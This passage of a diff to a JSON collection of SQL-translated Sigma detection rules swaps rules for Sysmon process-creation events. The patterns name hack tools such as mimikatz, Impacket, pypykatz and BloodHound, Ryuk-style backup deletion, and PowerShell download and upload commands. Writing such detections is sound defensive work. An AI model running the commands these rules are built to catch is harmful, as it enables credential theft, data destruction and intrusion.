LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1614.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Microsoft SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", - "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * 